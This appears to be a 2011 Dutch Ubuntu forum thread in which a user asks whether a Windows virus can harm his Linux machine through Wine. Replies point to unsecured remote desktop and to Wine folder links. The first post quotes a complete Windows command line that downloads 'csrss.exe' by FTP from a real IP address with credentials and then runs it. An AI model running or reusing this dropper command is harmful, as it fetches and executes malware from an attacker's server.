Nieuws:

Ubuntu-NL weer online!

Na een periode van technische problemen en een overbelaste server zijn we eindelijk weer bereikbaar.
Samen met Hobbynet, onze sponsor en hostingpartner, hebben we een oplossing gevonden zodat alles weer soepel draait.

Bedankt voor jullie geduld en begrip. We hopen nu weer verder te gaan waar we gebleven waren.

Het team van Ubuntu-NL

Welkom, Gast. Alsjeblieft inloggen of registreren.
Heb je de activerings-mail niet ontvangen?

Auteur Topic: Kan een windows virus kwaad doen in ubuntu met wine?  (gelezen 1098 keer)

Offline Emass

• Lid
Kan een windows virus kwaad doen in ubuntu met wine?
« Gepost op: 2011/05/15, 21:49:55 »
Ik kwam zojuist terug op mijn ubuntu computer. Ik heb meestal emesene openstaan, maar vandaag was er iets vreemds aan de hand. In de zoekbalk stond de volgende tekst:

del eq&echo open 93.116.174.227 6091 >> eq&echo user 28262 23412 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq

Nu lijkt me dit een duidelijk geval van een virus die iets van mij wilt versturen naar een ftp server. Nu ben ik een ubuntu gebruiker, mede door de veiligheid. Nu vraag ik me af of deze virus mij alsnog kwaad kan doen op mijn linux bakkie. Ik heb namelijk wel wine geinstalleerd en een .exe bestand ingesteld om standaard uitgevoerd te worden door wine.
Is het nu zo dat dit .exe bestand nogsteens uitgevoerd zou kunnen worden en de gegevens versturen? Zou dit .exe bestandje alsnog ergens op mijn computer staan? Hoe 'veilig' is ubuntu op nu eigenlijk?

De regel hierboven geeft ook best veel info over de 'bad guys', niet? In ieder geval de ftp gegevens en server locatie. Met een whois lookup krijg ik een server in Moldova.
« Laatst bewerkt op: 2011/05/15, 21:54:13 door Emass »

Offline jan11000

• Lid
Re: Kan een windows virus kwaad doen in ubuntu met wine?
« Reactie #2 Gepost op: 2011/05/16, 07:14:56 »
En wat doet een virusscan?

Offline Johan van Dijk

• Administrator
    • johanvandijk
« Reactie #3 Gepost op: 2011/05/16, 07:34:13 »
Heb je misschien "bureaublad op afstand" (remote desktop) aan staan, zonder die te beveiligen met een wachtwoord?
En in welke zoekbalk stond die tekst precies?

Het lijkt me niet dat het een virus is. Misschien dat iemand geprobeerd heeft om in te breken in je computer via remote desktop of emesene, maar die poging is dan waarschijnlijk mislukt.

Denk je toch dat het een Windowsvirus is die via wine werkt, dan is de tip van Pjotr wel een goede.

Offline niekn

• Lid
    • omega-xis
« Reactie #4 Gepost op: 2011/05/16, 08:42:51 »
Heb je misschien "bureaublad op afstand" (remote desktop) aan staan, zonder die te beveiligen met een wachtwoord?

Het lijkt me niet dat het een virus is. Misschien dat iemand geprobeerd heeft om in te breken in je computer via remote desktop of emesene, maar die poging is dan waarschijnlijk mislukt.

Denk je toch dat het een Windowsvirus is die via wine werkt, dan is de tip van Pjotr wel een goede.

tjah, hoe beter wine word, hoe meer rotzooi het kan draaien.
dankzij het rechtensysteem van ubuntu en slimme dingen als apparmor kan het virus je niet veel doen, maar als je de links naar je "muziek, video's, documenten en downloadsmappen" in /home/je-naam/.wine/dosdevices/drive_c/documents and settings/je-naam/ niet hebt verwijderd dan kan het virus wel vervelende dingen doen in je home-map!. helaas staan die links er standaard, gewoon verwijderen en vervangen door een map met dezelfde naam (zodat hij niet "doorlinkt"). in dat geval kan een virus weinig schade aanrichten

« Reactie #5 Gepost op: 2011/05/16, 08:58:00 »
Ik betwijfel of het verwijderen van die links werkt. Heb ze zelf ook verwijderd maar met Explorer.exe kun je nog gewoon doodleuk het hele systeem doorwandelen je kunt alleen geen bestanden verwijderen buiten C: dwz Explorer kan dat niet, misschien een kwaadwillend programma wel.

Offline Emass

• Lid
« Reactie #6 Gepost op: 2011/05/16, 21:02:51 »

Dat klopt inderdaad. Ik gebruik inderdaad bureaublad op afstand om met me mobiel bij mn computer te kunnen. Ik zal het beter beveiligen, plus mn wine beveiligen met behulp van de link van Pjotr. Denk dat het dan wel goed zit. Bedankt voor de tips!